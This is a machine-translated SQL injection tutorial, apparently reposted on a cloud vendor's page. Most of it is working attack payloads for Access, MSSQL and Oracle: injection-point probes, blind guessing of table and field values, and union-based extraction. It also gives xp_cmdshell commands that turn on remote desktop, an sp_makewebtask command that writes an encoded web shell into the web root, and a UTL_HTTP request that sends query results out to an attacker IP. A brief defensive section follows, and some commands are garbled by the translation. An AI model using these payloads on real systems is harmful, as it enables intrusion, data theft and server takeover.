SQL injection Detailed

Source: Internet
Author: User
Tags explode mssql mysql injection pear sql injection access database

1: What is SQL injection

SQL injection is an attack that inserts or adds SQL code to the input parameters of an application (user) and then passes those parameters to the SQL Server behind the scenes for parsing and execution.

Www.xx.com/news.php?id=1
Www.xx.com/news.php?id=1 and 1=1

Here, let's take a look at SQL injection

First of all, SQL injection perennial owasp ranked first ~

What is the process of SQL injection? See

What are the dangers of SQL injection?

Database Information Disclosure
Web tampering
website is hanging horse
Database is maliciously manipulated
Server is remote controlled
Destroy hard drive data ....

2 Let's take a look at the SQL injection method

2.1 Canceling friendly HTTP error messages

Generally, remote testing is used to determine if there is SQL injection, so there is usually no chance to review the injected query structure by looking at the source code. This leads to the frequent need for extensive testing through reasoning.

Open IE Browser and choose the menu Tools, Internet Options dialog box.
Open the Advanced tab, find the Browse group in the list of settings,
Uncheck the "Show friendly HTTP error messages" check box. Such as

2.2 Finding SQL Injection

The most common method of SQL injection, look for Web pages in the following form
Www.chinaliancheng.com/*.asp?id=1
Www.chinaliancheng.com/*.aspx?id=1
Www.chinaliancheng.com/*.php?id=1
Www.chinaliancheng.com/*.jsp?id=1
Single quotation mark method
Submit single quotation mark, page return error
and 1=1 and 1=2
Submit and 1=1 page return normal, submit and 1=2 page return error

2.3 Confirm Injection Point

Distinguishing between numbers and strings
Digital type
SELECT *from User WHERE id=1
SELECT * from user WHERE ID > 1
Quoted type of
SELECT * FROM user WHERE name = ' Admin '
SELECT * from user WHERE date > ' 2017-5-3 '

Inline SQL injection: Inline injection means that the original query is still fully executed after inserting the SQL code into the query.

Terminating SQL injection: A terminating SQL statement injection is an attacker who successfully ends a statement by annotating the remaining queries when injecting SQL code.

3: Identify the database

3.1: Database connection operator

Www.xx.com/news.php?uid=admin
Www.xx.com/news.php?uid=ad ' + ' min
Www.xx.com/news.php?uid=ad ' min
www.xx.com/news.php?uid=ad| |min

3.2 Access Database Injection

Get database types with built-in database tables

and (select COUNT (*) from sysobjects) >=0
Sysobjects for MSSQL database built-in table
and (select COUNT (*) from msysobjects) >=0
Msysobjects built-in tables for Access databases

Access hand-injected guessing

Guess table name
and exists (SELECT * from table name)
and (select COUNT (*) from table name) >=0

Guess Field name
and exists (select field name from table name)
and (select count (field name) from table name) >=0
Guess field length
and (select top 1 len (field name) from table name) >1
and (select top 1 len (field name) from table name) >2
and (select top 1 len (field name) from table name) >n

Guess field value
and (select top 1 ASC (Mid (field name, top)) from table name) >0
and (select top 1 ASC (Mid (field name, top)) from table name) >1
and (select top 1 ASC (Mid (field name, top)) from table name) >n
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >0
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >2
and (select top 1 ASC (Mid (field name, 2,1)) from table name) >n

Order by guessing number of fields

Order by 1
Order by 2
Order by N

Union Select gets the segment content
Union Select 1, field name, 2,..., n from table name

3.3 MSSQL Database Injection

In the MSSQL injection attack, the MSSQL injection point is the first to conduct a basic injection check to determine the subsequent attack implementation.

Judgment of Injection Point type
and exists (SELECT * from sysobjects)
Injection Point Authority judgment
and 1= (select Is_srvrolemember (' sysadmin '))//Determine if the system administrator
and 1= (select Is_srvrolemember (' db_owner '))//Determine if library permissions
and 1= (select Is_srvrolemember (' Public '))//To determine whether public permissions

Return information judgment
and @ @version >0//Database information
;d eclare @d INT//Judge MSSQL support multi-line statement query
and (select COUNT (1) from [sysobjects]) >=0//whether subqueries are supported
and user>0//Get the current database user name
and 1=convert (Int,db_name ()) or 1 = (select Db_name ())//Current database name
and 1= (SELECT @ @servername)//Local Service Name
and 1= (select Has_dbaccess (' master '))//Determine if there is a library Read permission

Check Extended storage
Check xp_cmdshell Extended Storage
and 1= (SELECT COUNT (*) from master.dbo.sysobjects WHERE xtype = ' X ' and name = ' xp_cmdshell ')
Check Xp_regread Extended Storage
and 1= (SELECT COUNT (*) from master.dbo.sysobjects where name = ' Xp_regread ')

Recovering extended Storage
Delete xp_cmdshell
EXEC master. Sp_dropextendedproc ' xp_cmdshell '
Create xp_cmdshell
EXEC master. Sp_addextendedprocxp_cmdshell, ' Xplog70.dll '
This statement automatically recovers xp_cmdshell using the default "Xplog70.dll" file in the system.
If Xplog70.dll is deleted or renamed, you can customize the path to recover:
EXEC master. Sp_addextendedproc ' xp_cmdshell ', ' C:\xplog70.dll '

Exploitation method of extended storage attack under SA privilege
xp_cmdshell extensions execute arbitrary commands
Execute arbitrary command
; EXEC master. xp_cmdshell ' dir C + '
Open 3389
EXEC master. xp_cmdshell ' sc config termservice start=auto '
EXEC master. xp_cmdshell ' net start TermService '
EXEC master. xp_cmdshell ' reg add
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server"/V
fdenytsconnections/t reg_dword/d 0x0/f '

Use Sp_makewebtash to write a word trojan
EXEC sp_makewebtask
' C:\inetpub\wwwroot\c.asp ', ' select '%3c%25%65%76%61%6c%20%72%65%71%75%65%73%74%28%22%
63%68%6f%70%70%65%72%22%29%25%3e ""

Exploitation of extended attack under Dbowner privilege
Determine database user permissions
and 1= (select Is_member (' db_owner '));
Search Web Directory
Create a temporary table
Create table temp (dir nvarchar (255), depth varchar (255), files varchar (255), ID int not nullidentity (all));
Extending Queries with Xp_dirtree
Insert into temp (dir,depth,files) EXEC master.dbo.xp_dirtree ' C: ',
Querying the contents of a table
and (select dir from temp where id=1) >0

Another way to query Bauku
Burst field names and field values
Increase the value of the number n to get all the fields in the table
and (Select Col_name (object_id (' table name '), N)) =0
Get field Contents
and (select top 1 field name from table name) >0
Explode other field values
and (select top 1 field name from table name where field name <> field value 1) >0

3.4 Oracle Database Injection

Oracle Injection Point judgment
and 1=1 and 1=2
/*
--
;
and exists (SELECT * from dual)
and exists (select COUNT (*) from User_tables) >0

Injection Point information judgment
After determining the injection point type, as in the previous MySQL injection, first use order by to guess the number of fields, and then use the Federated Query Union select method to get the information you want.
Get Database version Information
and 1=2 Union Select Null,null, (select banner from Sys.v_$version where rownum=1) from dual
Gets the current database connection user name
and 1=2 Union Select Null,null, (select Sys_context (' USERENV ', ' Current_User ') fromdual) from dual
Get System Platform
and 1=2 Union Select Null,null, (select member from V$logfile where rownum=1) from dual
Get Server Sid
and 1=2 Union Select Null,null, (select Instance_namefrom v$instance) from dual

 and 1=2 Union Select Null,null, (select owner from All_tables where rownum=1) from dual
after the first library name, you can use the following statement to continue to explode other library names
 and 1=2 Union Select Null,null, (select owner from All_tab Le where rownum=1 and owner<> ' first library name ') from dual
Get table name
 and 1=2 Union Select Null,null, (SELECT table_name From User_tables where rownum=1) from dual
to explode other table names
 and 1=2 Union Select Null,null, (select table_name from use R_tables where Rownum=1 and table_name<> ' first table name ') from dual
Note: The table name should be in uppercase or uppercase hexadecimal code.

Get field Name
and 1=2 Union Select Null,null, (select column_name from user_tab_columns where table_name= ' table name ' and Rownum=1 ' from dual
Get other field names
and 1=2 Union Select Null,null, (select column_name from user_tab_columns where table_name= ' table name ' and column_name<> ' first Fields ' and rownum=1) from dual
Get field Contents
and 1=2 Union select null,null, field name from table name

Determine if the utl_http stored procedure is available
and exists (select COUNT (*) from All_objectswhere object_name= ' utl_http ')
Listening to local ports
Nc–vv–l–p 8888
Utl_http Rebound Injection
and Utl_http.request (' Http://IP: Port number/' | | (query statement)) =1

4 Injection Tool Introduction

5 Defending SQL injection

Using parameterized queries

PHP contains many frameworks for accessing the database. Access to MySQL database mysqli package, PEAR::MDB2 package (it replaces the popular PEAR::D B Package) and the new PHP data Object (PDO) framework, they are all for the use of parameterized statements to facilitate.

Input validation

A powerful means of control (if used well) to validate the input received by the app.


White List
Using the whitelist should have the following key points:
Data type: characters, numbers, etc.;
Data size: The length of the string is correct, the size and precision of the number is correct.
Data range: If it is a numeric type, whether it is in the desired range of numbers for that data type.
Data content: Whether the data belongs to the desired data type, such as a mobile phone number, whether it is hiding the expected value.
Blacklist
The usual way to blacklist authentication is also to use regular expressions.

Encode input and use stored procedure defense

In addition to validating the input that the app receives, it is often necessary to encode the content passed in different modules or portions of the app.

It is often overlooked that the information from the database is encoded, especially if the database being used is not rigorously validated or censored, or comes from a third-party data source.


Designing an app to use a stored procedure specifically to access the database is a technique that can place or mitigate the effects of SQL injection. Store
A procedure is a program that is saved in a database rollup. Depending on the database, you can use many different languages and their variants to write stored procedures

Portal- penetration test-use burp to blast user name and password

Google Search engine syntax

Provide full penetration test data 1144890271


SQL injection Detailed

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.